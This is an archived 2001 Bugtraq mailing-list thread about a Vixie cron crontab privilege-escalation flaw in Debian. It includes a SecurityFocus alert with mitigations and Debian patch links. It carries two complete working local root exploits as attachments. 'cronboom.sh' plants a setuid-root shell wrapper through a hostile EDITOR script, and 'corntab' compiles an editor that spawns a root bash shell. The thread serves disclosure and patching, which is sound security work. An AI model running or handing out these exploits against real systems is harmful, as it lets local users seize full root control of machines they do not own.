6468468 2001-05-07 16:08 -0600 /17 rader/ Cade Cairns <cairnsc@SECURITYFOCUS.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-05-08 17:38 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: cairnsc@SECURITYFOCUS.COM
Mottagare: Bugtraq (import) <16915>
Ärende: Vixie cron vulnerability
------------------------------------------------------------
Greetings Bugtraqers,
Attached is a simple proof of concept for the vixie cron vulnerability
recently published in Debian Security Advisory DSA-054-1. The code was
written during SIA analysis of this vulnerability.
Further information on the vulnerability may be found in the
SecurityFocus SIA commercial alert, also attached to this message.
Cade Cairns
SecurityFocus
http://www.securityfocus.com/
(6468468) /Cade Cairns <cairnsc@SECURITYFOCUS.COM>/(Ombruten)
Bilaga (text/plain) i text 6468469
Bilaga (text/plain) i text 6468470
Kommentar i text 6469468 av Edwin Chiu <Edwin.Chiu@E-WARES.COM>
Kommentar i text 6469755 av Michal Zalewski <lcamtuf@COREDUMP.CX>
6468469 2001-05-07 16:08 -0600 /83 rader/ Cade Cairns <cairnsc@SECURITYFOCUS.COM>
Bilagans filnamn: "cronboom.sh"
Importerad: 2001-05-08 17:38 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: cairnsc@SECURITYFOCUS.COM
Mottagare: Bugtraq (import) <16916>
Bilaga (text/plain) till text 6468468
Ärende: Bilaga (cronboom.sh) till: Vixie cron vulnerability
------------------------------------------------------------
#!/bin/sh
#
# cronboom - simple proof-of-concept exploit for vixie cron version 3.1pl1
#
# synopsis:
# the crontab file maintenance program (crontab) fails to drop privileges
# before invoking the editor under certain circumstances.
#
# description:
# a serialization error exists in some versions of the file maintenance
# program, crontab. the vulnerability was introduced in versions which
# were patched for seperate vulnerability in fall of 2000 (see Bugtraq
# ID #1960).
#
# when a parsing error occurs after a modification operation, crontab will
# fail to drop privileges correctly for subsequent modification operations.
# because the program is installed setuid root, it may be possible for a
# local user to gain root privileges.
#
# affected versions:
# cron_3.0pl1-57.2 distributed with Debian Linux 2.2.
#
# note that copies of the program with the patch mentioned above are likely
# to also be vulnerable.
#
# references:
# http://www.securityfocus.com/bid/2687
#
# 05/07/01 cairnsc@securityfocus.com
CRONTAB=/usr/bin/crontab
if ! test -x $CRONTAB; then
echo "** unable to locate crontab executable, exiting"
exit 1
fi
cat > vcsh.c << EOF
#include <unistd.h>
int main() {
setuid(0);
setgid(0);
execl("/bin/sh", "sh", NULL);
}
EOF
echo "** compiling shell wrapper as $PWD/vcsh"
cc -o $PWD/vcsh $PWD/vcsh.c
if ! test -x $PWD/vcsh; then
echo "** compilation failed, exiting"
exit 1
fi
echo "** creating simple exploit script as $PWD/vcex.sh"
cat > vcex.sh << EOF
#!/bin/sh
sleep 1 && echo "foo" >> \$1
if test -f $PWD/vcboom; then
chown root.root $PWD/vcsh
chmod 4755 $PWD/vcsh
rm $PWD/vcboom
else
touch $PWD/vcboom
fi
EOF
chmod 0755 $PWD/vcex.sh
echo "** running $CRONTAB -e" echo "**" echo "** enter 'yes' at the
first prompt, then enter 'no' at the second" echo
(EDITOR=$PWD/vcex.sh $CRONTAB -e)
echo
echo "** done, the shell wrapper should be suid root"
exit 0
(6468469) /Cade Cairns <cairnsc@SECURITYFOCUS.COM>/(Ombruten)
6468470 2001-05-07 16:08 -0600 /250 rader/ Cade Cairns <cairnsc@SECURITYFOCUS.COM>
Bilagans filnamn: "SIA-2687.txt"
Importerad: 2001-05-08 17:38 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: cairnsc@SECURITYFOCUS.COM
Mottagare: Bugtraq (import) <16917>
Bilaga (text/plain) till text 6468468
Ärende: Bilaga (SIA-2687.txt) till: Vixie cron vulnerability
------------------------------------------------------------
Thank you for using SecurityFocus.com's Security Intelligence Alert
(SIA) Service. To manage account please visit
https://alerts.securityfocus.com/
For questions or comments email us at alerts@securityfocus.com.
---------------------------------------------------------------------------
Security Alert
Subject: Vixie Cron crontab Privilege Lowering Failure Vulnerability
BUGTRAQ ID: 2687 CVE ID: CVE-MAP-NOMATCH
Published: May 07, 2001 Updated: May 07, 2001
Remote: No Local: Yes
Availability: User Initiated Authentication: Not Required
Credibility: Vendor Confirmed Ease: Exploit Available
Class: Serialization Error
Impact: 10.00 Severity: 6.90 Urgency: 7.59
Last Change: Initial analysis.
---------------------------------------------------------------------------
Vulnerable Systems:
Paul Vixie Vixie Cron 3.0pl1
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
Non-Vulnerable Systems:
Summary:
Local users can cause Vixie crontab to fail to drop privileges
when editing files. Can lead to full system compromise.
Impact:
Local users can manipulate crontab's lowering of privileges,
leading to full system compromise.
Technical Description:
Vixie cron is an implementation of the popular UNIX program that
runs user-specified programs at periodic scheduled times.
A serialization error exists in some versions of the crontab
file maintenance program. The vulnerability was introduced in
versions which were patched for seperate vulnerability in fall
of 2000 (see Bugtraq ID #1960).
When a parsing error occurs after a modification operation,
crontab will fail to drop privileges correctly for subsequent
modification operations. Because the program is installed setuid
root, it may be possible for a local user to gain root
privileges.
Attack Scenarios:
An attacker with local access must edit their crontab file and
enter a line that causes the parser to fail.
The attacker must then enter 'yes' when prompted as to whether he or
she wishes to attempt to fix the error in the file. This will cause
the editor to be invoked again, but with full privileges.
The attacker could then execute arbitrary commands from the editor,
or overwrite otherwise protected system files.
Exploits:
During SIA analysis of this vulnerability, Cade Cairns
<cairnsc@securityfocus.com> wrote proof-of-concept exploit code.
http://www.securityfocus.com/data/vulnerabilities/exploits/cronboom.sh
Mitigating Strategies:
Restricting local access to the host may prevent unauthorized
users from exploiting this vulnerability. Restrict access to the
cron faciliy to trusted users via the /etc/cron.allow and
/etc/cron.deny files (man crontab).
Solutions:
For Paul Vixie Vixie Cron 3.0pl1:
Debian upgrade 2.2 alpha cron_3.0pl1-57.3_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/cro
n_3.0pl1-57.3_alpha.deb
Debian upgrade 2.2 arm cron_3.0pl1-57.3_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/cron_
3.0pl1-57.3_arm.deb
Debian upgrade 2.2 i386 cron_3.0pl1-57.3_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/cron
_3.0pl1-57.3_i386.deb
Debian upgrade 2.2 m68k cron_3.0pl1-57.3_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/cron
_3.0pl1-57.3_m68k.deb
Debian upgrade 2.2 ppc cron_3.0pl1-57.3_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/c
ron_3.0pl1-57.3_powerpc.deb
Debian upgrade 2.2 sparc cron_3.0pl1-57.3_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/cro
n_3.0pl1-57.3_sparc.deb
Credit:
Posted to Bugtraq in a Debian Security Advisory (DSA-054-1) on May
7, 2001.
References:
advisory:
Debian DSA-054-1: cron
http://www.securityfocus.com/advisories/3282
ChangeLog:
May 07, 2001: Initial analysis.
---------------------------------------------------------------------------
HOW TO INTERPRET THIS ALERT
BUGTRAQ ID: This is a unique identifier assigned to the
vulnerability by SecurityFocus.com.
CVE ID: This is a unique identifier assigned to the
vulnerability by the CVE.
Published: The date the vulnerability was first made
public.
Updated: The date the information was last updated.
Remote: Whether this is a remotely exploitable
vulnerability.
Local: Whether this is a locally exploitable
vulnerability.
Credibility: Describes how credible the information about the
vulnerability is. Possible values are:
Conflicting Reports: The are multiple
conflicting about the existance of the
vulnerability.
Single Source: There is a single non-reliable
source reporting the existence of the
vulnerability.
Reliable Source: There is a single reliable
source reporting the existence of the
vulnerability.
Conflicting Details: There is consensus on the
existence of the vulnerability but not it's
details.
Multiple Sources: There is consensus on the
existence and details of the vulnerability.
Vendor Confirmed: The vendor has
confirmed the vulnerability.
Class: The class of vulnerability. Possible values are:
Boundary Condition Error, Access Validation Error,
Origin Validation Error, Input Valiadtion Error,
Failure to Handle Exceptional Conditions, Race
Condition Error, Serialization Error, Atomicity
Error, Environment Error, and Configuration Error.
Ease: Rates how easiliy the vulnerability can be
exploited. Possible values are: No Exploit
Available, Exploit Available, and No Exploit
Required.
Impact: Rates the impact of the vulnerability. It's range
is 1 through 10.
Severity: Rates the severity of the vulnerability. It's range
is 1 through 10. It's computed from the impact
rating and remote flag. Remote vulnerabiliteis with
a high impact rating receive a high severity
rating. Local vulnerabilities with a low impact
rating receive a low severity rating.
Urgency: Rates how quickly you should take action to fix or
mitigate the vulnerability. It's range is 1 through
10. It's computed from the severity rating, the
ease rating, and the credibility rating. High
severity vulnerabilities with a high ease rating,
and a high confidence rating have a higher urgency
rating. Low severity vulnerabilities with a low
ease rating, and a low confidence rating have a
lower urgency rating.
Last Change: The last change made to the vulnerability
information.
Vulnerable Systems: The list of vulnerable systems. A '+' preceding a
system name indicates that one of the system
components is vulnerable vulnerable. For example,
Windows 98 ships with Internet Explorer. So if a
vulnerability is found in IE you may see something
like:
Microsoft Internet Explorer
+ Microsoft Windows 98
Non-Vulnerable Systems: The list of non-vulnerable systems.
Summary: A concise summary of the vulnerability.
Impact: The impact of the vulnerability.
Technical Description: The in-depth description of the vulnerability.
Attack Scenarios: Ways an attacker may make use of the
vulnerability.
Exploits: Exploit intructions or programs.
Mitigating Strategies: Ways to mitigate the vulnerability.
Solutions: Solutions to the vulnerability.
Credit: Information about who disclosed the
vulnerability.
References: Sources of information on the vulnerability.
Related Resources: Resources that might be of additional value.
ChangeLog: History of changes to the vulnerability
record.
---------------------------------------------------------------------------
Copyright 2001 SecurityFocus.com
Thank you for using SecurityFocus.com's Security Intelligence Alert
(SIA) Service. To manage your account please visit
https://alerts.securityfocus.com/
For questions or comments email us at alerts@securityfocus.com.
(6468470) /Cade Cairns <cairnsc@SECURITYFOCUS.COM>/(Ombruten)
6469468 2001-05-08 13:44 -0400 /34 rader/ Edwin Chiu <Edwin.Chiu@E-WARES.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-05-08 22:45 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: Edwin.Chiu@E-WARES.COM
Mottagare: Bugtraq (import) <16922>
Kommentar till text 6468468 av Cade Cairns <cairnsc@SECURITYFOCUS.COM>
Ärende: Re: Vixie cron vulnerability
------------------------------------------------------------
From: Edwin Chiu <Edwin.Chiu@E-WARES.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <3AF83087.B0D2765@e-wares.com>
FYI
The exploit failed for:
Redhat 6.1
vixie-cron-3.0.1-39
Redhat 6.2
vixie-cron-3.0.1-40
Regards,
Edwin
Cade Cairns wrote:
> Greetings Bugtraqers,
>
> Attached is a simple proof of concept for the vixie cron vulnerability
> recently published in Debian Security Advisory DSA-054-1. The code was
> written during SIA analysis of this vulnerability.
>
> Further information on the vulnerability may be found in the SecurityFocus
> SIA commercial alert, also attached to this message.
>
> Cade Cairns
> SecurityFocus
> http://www.securityfocus.com/
(6469468) /Edwin Chiu <Edwin.Chiu@E-WARES.COM>/-----
Kommentar i text 6469713 av Jay D. Dyson <jdyson@TREACHERY.NET>
6469713 2001-05-08 14:01 -0700 /39 rader/ Jay D. Dyson <jdyson@TREACHERY.NET>
Sänt av: joel@lysator.liu.se
Importerad: 2001-05-09 00:05 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: jdyson@treachery.net
Mottagare: Bugtraq (import) <16923>
Kommentar till text 6469468 av Edwin Chiu <Edwin.Chiu@E-WARES.COM>
Ärende: Re: Vixie cron vulnerability
------------------------------------------------------------
From: "Jay D. Dyson" <jdyson@TREACHERY.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.GSO.3.96.1010508135756.3740B-100000@crypto>
-----BEGIN PGP SIGNED MESSAGE-----
On Tue, 8 May 2001, Edwin Chiu wrote:
> The exploit failed for:
> Redhat 6.1
> vixie-cron-3.0.1-39
> Redhat 6.2
> vixie-cron-3.0.1-40
*nod* I wrote to Cade directly regarding the advisory as it
seems to me that the issue is more a matter of Debian's
implementation of Vixie cron than an issue with Vixie cron itself.
I'm still futzing with it to see if any other implementations will
squeal. Fun and interesting results will be posted when found. ;)
- -Jay
( ( _______
)) )) .- "There's always time for a good cup of coffee" -. >====<--.
C|~~|C|~~| (>------ Jay D. Dyson -- jdyson@treachery.net ------<) | = |-'
`--' `--' `---------- "Si vis pacem, para bellum." ----------' `------'
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: See http://www.treachery.net/~jdyson/ for current keys.
iQCVAwUBOvhQldCClfiU/BIVAQECcgP/fnDkOGxVAm6S+UKnCS5Kmdjnl67nVYGf
IFaWyv9JKF82A7E7L0PBI9hTe27YvyhamFDBVIDAu79n1AszxXUt7g+F0WEuHtpy
gBegB1+KnJCq8vzzdB9kBmCAe+XeILaG49BvACOcvww2AJN0YZhHu3ZA5COtWwhF
QxBGcf+6MFw=
=pGCW
-----END PGP SIGNATURE-----
(6469713) /Jay D. Dyson <jdyson@TREACHERY.NET>/(Ombruten)
6469755 2001-05-08 11:30 -0400 /18 rader/ Michal Zalewski <lcamtuf@COREDUMP.CX>
Sänt av: joel@lysator.liu.se
Importerad: 2001-05-09 00:24 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: lcamtuf@COREDUMP.CX
Mottagare: Bugtraq (import) <16924>
Kommentar till text 6468468 av Cade Cairns <cairnsc@SECURITYFOCUS.COM>
Ärende: Re: Vixie cron vulnerability
------------------------------------------------------------
On Mon, 7 May 2001, Cade Cairns wrote:
> Attached is a simple proof of concept for the vixie cron vulnerability
> recently published in Debian Security Advisory DSA-054-1. The code was
> written during SIA analysis of this vulnerability.
Hm, there is my original proof-of-concept I coded for Sebastian
Krahmer (who discovered this vulnerability), while working on
it. This vulnerability affects Debian, SuSE, and probably few other
Linuxes as well. It is a perfect example of bad coding, and how
improper fixing of bugs might lead to even more dangerous
conditions. It is fully automated, and I believe it gives absolutely
nothing to the attacker, as this vulnerability can be exploited by
hand in approximately 5 seconds ;)
Michal Zalewski
http://lcamtuf.coredump.cx
(6469755) /Michal Zalewski <lcamtuf@COREDUMP.CX>/(Ombruten)
Bilaga (text/plain) i text 6469756
6469756 2001-05-08 11:30 -0400 /88 rader/ Michal Zalewski <lcamtuf@COREDUMP.CX>
Bilagans filnamn: "corntab"
Importerad: 2001-05-09 00:24 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: lcamtuf@COREDUMP.CX
Mottagare: Bugtraq (import) <16925>
Bilaga (text/plain) till text 6469755
Ärende: Bilaga (corntab) till: Re: Vixie cron vulnerability
------------------------------------------------------------
#!/bin/bash
clear
echo ".-----------------------------------------------------------."
echo "| Marchew.Hyperreal presents: vixie crontab exploit #728371 |"
echo "|===========================================================|"
echo "| Sebastian Krahmer <krahmer@security.is> |"
echo "| Michal Zalewski <lcamtuf@coredump.cx> |"
echo "\`-----------------------------------------------------------'"
echo
test "$CRONBIN" = "" && CRONBIN=/usr/bin/crontab
echo ">>> Using binary: $CRONBIN"
echo -n ">>> Setuid check: "
if [ -u $CRONBIN ]; then
echo "PASSED"
else
echo "FAILED"
echo
exit 1
fi
echo -n ">>> Version check: "
QQ=`strings $CRONBIN | grep '43 vixie Exp'`
if [ "$QQ" = "" ]; then
echo "FAILED"
echo
exit 1
else
echo "PASSED"
fi
echo ">>> Building exploit..."
cat >edit0r.c <<_eof_
#include <stdio.h>
int main(int argc,char* argv[]) {
sleep(1);
if (geteuid()) {
FILE* x=fopen(argv[1],"w");
fprintf(x,"blah blah blah\n");
fclose(x);
} else {
dup2(1,0);
dup2(1,2);
printf("\n>>> Entering rootshell, babe...\n");
system("touch $HOME/.xploited");
system("bash");
}
}
_eof_
gcc edit0r.c -o edit0r &>/dev/null
rm -f edit0r.c
if [ ! -f edit0r ]; then
echo ">>> Cannot compile exploit."
echo
exit 1
fi
rm -f ~/.xploited
echo ">>> Performing attack..."
( echo "y"; echo "n" ) | VISUAL=$PWD/edit0r $CRONBIN -e 2>/dev/null
rm -f edit0r
if [ -f ~/.xploited ]; then
echo
echo ">>> Thank you."
rm -f ~/.xploited
echo
exit 0
else
echo
echo ">>> Apparently I am not able to exploit it, sorry..."
echo
exit 1
fi
(6469756) /Michal Zalewski <lcamtuf@COREDUMP.CX>/---